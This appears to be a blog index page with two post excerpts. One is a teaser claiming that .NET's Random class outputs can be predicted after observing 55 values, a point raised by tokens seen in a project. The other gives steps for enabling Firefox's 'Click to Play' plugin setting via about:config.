Breaking .NET’s Random class

Security is hard. In a current project I saw some code that created some access tokens based on a random number generator – .NET’s Random class. The code used an instance of Random stored in static field and I got curious:

If you have such a long living Random instance, could you predict the random values after generating a few of them?

It turns out, it is possible. And you only need to read 56 55 “random” values to predict all future values.

Read more →

Click to play for plugins (Flash, Java) in Firefox

In Google Chrome, there is an option to enable “Click to Play” for plugins, such as Flash, Java, or Silverlight. This makes the browser safer (especially after all the Java security vulnerability in the last time) and a little bit fast. Today, I found out that this option exists in Firefox too – although its a little bit hidden.

To enable “Click to Play” in Firefox…

  1. go to about:config and click on “I’ll be careful, I promise!”
  2. search for plugins.click_to_play and set it to true (by double-clicking the entry)

click_to_play_settings.jpg

After that, when you get to a page that contains Flash (videos), Java, or any other plugin, you’ll get a “Click to Play” message for the plugin.

click_to_play_message.jpg